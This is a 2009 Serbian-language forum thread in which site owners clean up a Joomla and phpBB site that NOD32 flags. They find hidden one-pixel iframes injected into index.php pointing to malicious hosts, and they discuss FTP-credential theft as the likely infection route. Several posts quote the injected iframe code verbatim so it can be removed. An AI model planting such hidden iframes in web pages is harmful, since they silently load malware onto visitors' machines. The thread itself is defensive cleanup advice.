Page 1 of 1

Nod32 blokira sajt

Posted: Sun Apr 19, 2009 10:17 pm
by evilmc
untitled.PNG
da li je ovo do mene ili stvarno na hostu imam ubacen virus?

Re: Nod32 blokira sajt

Posted: Mon Apr 20, 2009 12:19 am
by dmd
Imaš.
Izbaci (verovatno u index.php-u) zadnju liniju koda:

<iframe src="http://..."></iframe>

Re: Nod32 blokira sajt

Posted: Mon Apr 20, 2009 9:34 am
by evilmc
ovo su mi zadnje linije u index.php

Code: Select all

echo "<iframe src=\"http://sefauro.net/?click=6B1813\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

?>
<iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>
sta tacno da izbrisem?

a ovo mi je u forumu za index.php

Code: Select all

//
// Generate the page
//
$template->pparse('body');

include($phpbb_root_path . 'includes/page_tail.'.$phpEx);



echo "<iframe src=\"http://sefauro.net/?click=1B47575\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

?>

Re: Nod32 blokira sajt

Posted: Mon Apr 20, 2009 9:59 am
by sofija
Pa izbaci cledece linije"

Code: Select all

echo "<iframe src=\"http://sefauro.net/?click=6B1813\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

Code: Select all

<iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>

Code: Select all

echo "<iframe src=\"http://sefauro.net/?click=1B47575\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
I u buduce pazi gde skidas template, ako je to na sumljivim mestima uvek ih prvo proveri, obavezno u temlatima se nadje neki kod koji poziva udaljene scripte za instaliranje svega i svacega.

Re: Nod32 blokira sajt

Posted: Mon Apr 20, 2009 11:49 am
by evilmc
sofija wrote:I u buduce pazi gde skidas template, ako je to na sumljivim mestima uvek ih prvo proveri, obavezno u temlatima se nadje neki kod koji poziva udaljene scripte za instaliranje svega i svacega.
sajt mi je star godinu ipo i do sada nisam imao nikakvih problema...ovi frejmovi mi nisu u template, vec u root fajlovima od joomle, kao i u folderu FORUM gde su mi takodje skoro svi fajlovi zarazeni...tako da sada jedino resenje ostaje da skinem kod sebe fajlove i da skeniram sve...

Re: Nod32 blokira sajt

Posted: Mon Apr 20, 2009 12:38 pm
by cicans
Pogledaj u temu http://forum.joomla.org/viewtopic.php?f ... e#p1511209
Detaljno je objasnjeno - i provereno! ;)

Re: Nod32 blokira sajt

Posted: Mon Apr 20, 2009 12:45 pm
by Kayz
Hello I have same problem on the same day, same thing happened to me.

Sorry i dont understand your language, anybody speak english and can help me?

Hacker put

<iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>

In my index file, how they hack?

Re: Nod32 blokira sajt

Posted: Mon Apr 20, 2009 12:57 pm
by cicans

Re: Nod32 blokira sajt

Posted: Mon Apr 20, 2009 12:59 pm
by Vrlo Jak Tim
Hello Kayz, there is a dozen ways how they could did it.

What you can do now is to:
- change your admin/FTP username/pass,
- download full backup of your site to your PC
- check every file if there are anywhere else those <iframe> codes
- get rid of such codes / suspicious files
- be sure that your site works locally
- upload it back to server and keep all folders permissions to 755, files to 644; do some more research about Security on this forum, and implement some protections.

Maybe the source of problem is not on your account on server, but on server itself.

Re: Nod32 blokira sajt

Posted: Mon Apr 20, 2009 4:42 pm
by evilmc
sredio sam...srecom sam imao backup od fajlova i sve vratio i povezao sa bazom i sada je sve kul...
hvala svima.

Re: Nod32 blokira sajt

Posted: Mon Apr 20, 2009 7:27 pm
by evilmc
ponovo mi napali sajt :S
ja ne znam vise sta da radim :S
nije proslo ni 3-4 sata od kako sam ga sredio :/

Re: Nod32 blokira sajt

Posted: Fri Jun 12, 2009 9:52 pm
by vuperda
Meni je masa sajtova pala ne od strane servera i komponenti, nego sto je moj sistem bio krsh, znaci antivirus nije bio azuran i rootkit atack je lako uradio FTP leach, posle nema veze kakav je server ili joomla ili bilo sta drugo, to me naucilo da drzim stvari sigurne kod sebe, 100 nekih zastita sada imam i sve radi ok, srecom sam imao sve azurne backupe pa je restore bio brz i posle toga reset lozinki je resio stvari.... Mislim da taj sistem find/replace kroz fajlove ne bi tako lako radio, zato je backup stvarno spas u svakom slucaju.

Re: Nod32 blokira sajt

Posted: Sat Jun 13, 2009 12:16 am
by evilmc
bio je napad na server, ja sam bio svo vreme ubeđen da mi je neko napao sajt i forum :/
morao sam da obrišem sve sa hosta, i posle ubacio stari backup i stanje se stabilozovalo.

Re: Nod32 blokira sajt

Posted: Sat Jul 25, 2009 7:34 pm
by arsago
Pozdrav svima :)

Evo da se ukljucim i ja jer sam pre nekoliko meseci imao isti problem i to na svim mojim sajtovima.
Problem nije do joomle ili do servea,vec do ftp programa.Ako koristite neki ftp program za prebacivanje fajlova na server (ja sam koristio total commander) , onda imate veliki problem.
Pokupite virus na svoj komp i taj virus ukrade vas username i password iz ftp programa i onda automatski posalje virus na vas server i u sve index fajlove ubaci skriveni iframe ka sajtovima sa virusima.Takodje se ovaj kod ubacuje i u fajlove deafult.php.
Meni kad je se prvi put to desilo i to na svim sajtovima,ja sam vratio sve u normalu za kratko vreme jer sam imao backup ali posle nekoliko sati obidjem sajtove i opet na svim sajtovima virusi.
Kad sam ukapirao sta se desava onda sam izbacio ftp program iz upotrebe,otisao u direct admin i promenio sve passworde i od tada nemam vise problema.
Preporuka je da ne koristite nikakve ftp programe za prebacivanje fajlova vec da koristite c panel ili direct admin iz brovsera i naravno da u brovseru ne cuvate password vec svaki put kad se logujete onda ukucajte pass,jer bolje da svaki put kucate password nego da vam virusi uniste sajt.

Nadam se da sam nekome pomogao sa ovim mojim iskustvom.

Re: Nod32 blokira sajt

Posted: Sat Jul 25, 2009 7:47 pm
by Leftfield
arsago wrote:Preporuka je da ne koristite nikakve ftp programe za prebacivanje fajlova vec da koristite c panel ili direct admin iz brovsera i naravno da u brovseru ne cuvate password vec svaki put kad se logujete onda ukucajte pass,jer bolje da svaki put kucate password nego da vam virusi uniste sajt.
Ni to nije neka solucija. Ako cemo iskreno, jedina, ali jedina solucija je da se maknete sa Windowza i da koristite neki *nix sistem.

Re: Nod32 blokira sajt

Posted: Mon Jul 27, 2009 5:46 pm
by vuperda
Leftfield wrote: Ni to nije neka solucija. Ako cemo iskreno, jedina, ali jedina solucija je da se maknete sa Windowza i da koristite neki *nix sistem.
To vecini ljudi nece biti izvodljivo iz raznoraznih razloga jos dugo vremena...
Postoji i jedna zanimljiva solucija, portable FTP klijenti, oni samim tim nisu registrovani u sistemu tako da ih po zarazi sistema nije moguce tako lako detektovati, zapravo je najbolje preci na sve portabilne verzije, bilo FTP ili drugih programa...

Re: Nod32 blokira sajt

Posted: Mon Jul 27, 2009 9:46 pm
by Leftfield
Opet cemo jedno te isto. Jok. Ni to nije sigurno.

Najsigurnija stvar, tj. najbolja opcija je trenutno jxplorer ili neka komponenta koja se instalira na sajtu pa se vuku fajlovi pomocu nje. Ostalo a da valja je *nix.

Da li vecini odgovara ili ne? O tome necu da vodim polemiku. Ako ti je potrebno onda moraš a ako nije onda plaćaj i trpi.